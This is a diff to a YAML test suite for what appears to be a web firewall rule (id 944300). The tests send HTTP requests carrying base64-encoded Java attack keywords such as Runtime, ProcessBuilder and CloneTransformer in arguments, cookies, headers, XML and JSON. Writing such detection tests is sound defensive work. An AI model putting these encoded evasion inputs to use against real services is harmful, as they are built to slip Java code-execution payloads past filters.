@@ -81,7 +84,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 5
 desc: "Request header test includes keyword cnVudGltZQ"
 stages:
@@ -101,7 +105,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 6
 desc: "XML attribute value includes keyword cnVudGltZQ"
 stages:
@@ -120,7 +125,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 7
 desc: "XML element value includes keyword cnVudGltZQ"
 stages:
@@ -139,7 +145,8 @@ tests:
 version: "HTTP/1.0"
 data: "cnVudGltZQ"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 8
 desc: "Nested XML element value includes keyword cnVudGltZQ"
 stages:
@@ -158,7 +165,8 @@ tests:
 version: "HTTP/1.0"
 data: "cnVudGltZQ"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 9
 desc: "Content-Type text/plain includes keyword cnVudGltZQ"
 stages:
@@ -177,7 +185,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=cnVudGltZQ"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 10
 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ"
 stages:
@@ -196,7 +205,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"cnVudGltZQ\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 11
 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ"
 stages:
@@ -215,7 +225,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"cnVudGltZQ\": \"test\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 12
 desc: "Argument test includes keyword HJ1bnRpbWU"
 stages:
@@ -234,7 +245,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=HJ1bnRpbWU"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 13
 desc: "Argument name includes keyword HJ1bnRpbWU"
 stages:
@@ -253,7 +265,8 @@ tests:
 version: "HTTP/1.0"
 data: "HJ1bnRpbWU=test"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 14
 desc: "Cookie test includes keyword HJ1bnRpbWU"
 stages:
@@ -273,7 +286,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 15
 desc: "Cookie name includes keyword HJ1bnRpbWU"
 stages:
@@ -293,7 +307,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 16
 desc: "Request header test includes keyword HJ1bnRpbWU"
 stages:
@@ -313,7 +328,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 17
 desc: "XML attribute value includes keyword HJ1bnRpbWU"
 stages:
@@ -332,7 +348,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 18
 desc: "XML element value includes keyword HJ1bnRpbWU"
 stages:
@@ -351,7 +368,8 @@ tests:
 version: "HTTP/1.0"
 data: "HJ1bnRpbWU"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 19
 desc: "Nested XML element value includes keyword HJ1bnRpbWU"
 stages:
@@ -370,7 +388,8 @@ tests:
 version: "HTTP/1.0"
 data: "HJ1bnRpbWU"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 20
 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU"
 stages:
@@ -389,7 +408,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=HJ1bnRpbWU"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 21
 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU"
 stages:
@@ -408,7 +428,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"HJ1bnRpbWU\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 22
 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU"
 stages:
@@ -427,7 +448,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"HJ1bnRpbWU\": \"test\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 23
 desc: "Argument test includes keyword BydW50aW1l"
 stages:
@@ -446,7 +468,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=BydW50aW1l"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 24
 desc: "Argument name includes keyword BydW50aW1l"
 stages:
@@ -465,7 +488,8 @@ tests:
 version: "HTTP/1.0"
 data: "BydW50aW1l=test"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 25
 desc: "Cookie test includes keyword BydW50aW1l"
 stages:
@@ -485,7 +509,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 26
 desc: "Cookie name includes keyword BydW50aW1l"
 stages:
@@ -505,7 +530,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 27
 desc: "Request header test includes keyword BydW50aW1l"
 stages:
@@ -525,7 +551,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 28
 desc: "XML attribute value includes keyword BydW50aW1l"
 stages:
@@ -544,7 +571,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 29
 desc: "XML element value includes keyword BydW50aW1l"
 stages:
@@ -563,7 +591,8 @@ tests:
 version: "HTTP/1.0"
 data: "BydW50aW1l"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 30
 desc: "Nested XML element value includes keyword BydW50aW1l"
 stages:
@@ -582,7 +611,8 @@ tests:
 version: "HTTP/1.0"
 data: "BydW50aW1l"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 31
 desc: "Content-Type text/plain includes keyword BydW50aW1l"
 stages:
@@ -601,7 +631,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=BydW50aW1l"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 32
 desc: "Content-Type application/json arg value includes keyword BydW50aW1l"
 stages:
@@ -620,7 +651,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"BydW50aW1l\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 33
 desc: "Content-Type application/json arg name includes keyword BydW50aW1l"
 stages:
@@ -639,7 +671,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"BydW50aW1l\": \"test\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 34
 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -658,7 +691,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=cHJvY2Vzc2J1aWxkZXI"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 35
 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -677,7 +711,8 @@ tests:
 version: "HTTP/1.0"
 data: "cHJvY2Vzc2J1aWxkZXI=test"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 36
 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -697,7 +732,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 37
 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -717,7 +753,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 38
 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -737,7 +774,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 39
 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -756,7 +794,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 40
 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -775,7 +814,8 @@ tests:
 version: "HTTP/1.0"
 data: "cHJvY2Vzc2J1aWxkZXI"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 41
 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -794,7 +834,8 @@ tests:
 version: "HTTP/1.0"
 data: "cHJvY2Vzc2J1aWxkZXI"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 42
 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -813,7 +854,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=cHJvY2Vzc2J1aWxkZXI"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 43
 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -832,7 +874,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 44
 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI"
 stages:
@@ -851,7 +894,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 45
 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -870,7 +914,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=HByb2Nlc3NidWlsZGVy"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 46
 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -889,7 +934,8 @@ tests:
 version: "HTTP/1.0"
 data: "HByb2Nlc3NidWlsZGVy=test"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 47
 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -909,7 +955,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 48
 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -929,7 +976,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 49
 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -949,7 +997,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 50
 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -968,7 +1017,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 51
 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -987,7 +1037,8 @@ tests:
 version: "HTTP/1.0"
 data: "HByb2Nlc3NidWlsZGVy"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 52
 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -1006,7 +1057,8 @@ tests:
 version: "HTTP/1.0"
 data: "HByb2Nlc3NidWlsZGVy"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 53
 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -1025,7 +1077,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=HByb2Nlc3NidWlsZGVy"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 54
 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -1044,7 +1097,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}"
 output:
- log_contains: "id \"944300\""
+ log:
+ expect_ids: [944300]
 - test_id: 55
 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy"
 stages:
@@ -1063,7 +1117,8 @@ tests: version: "HTTP/1.0" data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1082,7 +1137,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1101,7 +1157,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1121,7 +1178,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1141,7 +1199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1161,7 +1220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1180,7 +1240,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1199,7 +1260,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: 
@@ -1218,7 +1280,8 @@ tests: version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1237,7 +1300,8 @@ tests: version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1256,7 +1320,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: @@ -1275,7 +1340,8 @@ tests: version: "HTTP/1.0" data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1294,7 +1360,8 @@ tests: version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1313,7 +1380,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 69 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1333,7 +1401,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 70 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1353,7 +1422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: 
@@ -1373,7 +1443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1392,7 +1463,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1411,7 +1483,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1430,7 +1503,8 @@ tests: version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1449,7 +1523,8 @@ tests: version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1468,7 +1543,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: @@ -1487,7 +1563,8 @@ tests: version: "HTTP/1.0" data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1506,7 +1583,8 @@ tests: version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: 
@@ -1525,7 +1603,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1545,7 +1624,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1565,7 +1645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1585,7 +1666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1604,7 +1686,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1623,7 +1706,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1642,7 +1726,8 @@ tests: version: "HTTP/1.0" data: "GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1661,7 +1746,8 @@ tests: version: "HTTP/1.0" data: "test=GNsb25ldHJhbnNmb3JtZXI" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: 
@@ -1680,7 +1766,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: @@ -1699,7 +1786,8 @@ tests: version: "HTTP/1.0" data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1718,7 +1806,8 @@ tests: version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1737,7 +1826,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1757,7 +1847,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1777,7 +1868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1797,7 +1889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1816,7 +1909,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: 
@@ -1835,7 +1929,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1854,7 +1949,8 @@ tests: version: "HTTP/1.0" data: "BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1873,7 +1969,8 @@ tests: version: "HTTP/1.0" data: "test=BjbG9uZXRyYW5zZm9ybWVy" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1892,7 +1989,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: @@ -1911,7 +2009,8 @@ tests: version: "HTTP/1.0" data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1930,7 +2029,8 @@ tests: version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1949,7 +2049,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -1969,7 +2070,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: 
@@ -1989,7 +2091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2009,7 +2112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2028,7 +2132,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2047,7 +2152,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2066,7 +2172,8 @@ tests: version: "HTTP/1.0" data: "Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2085,7 +2192,8 @@ tests: version: "HTTP/1.0" data: "test=Zm9yY2xvc3VyZQ" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2104,7 +2212,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: @@ -2123,7 +2232,8 @@ tests: version: "HTTP/1.0" data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: 
@@ -2142,7 +2252,8 @@ tests: version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: @@ -2161,7 +2272,8 @@ tests: version: "HTTP/1.0" data: "GZvcmNsb3N1cmU=test" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: @@ -2181,7 +2293,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: @@ -2201,7 +2314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: @@ -2221,7 +2335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944300\"" + log: + expect_ids: [944300] - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: @@ -2240,7 +2355,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944300\"" + log: + 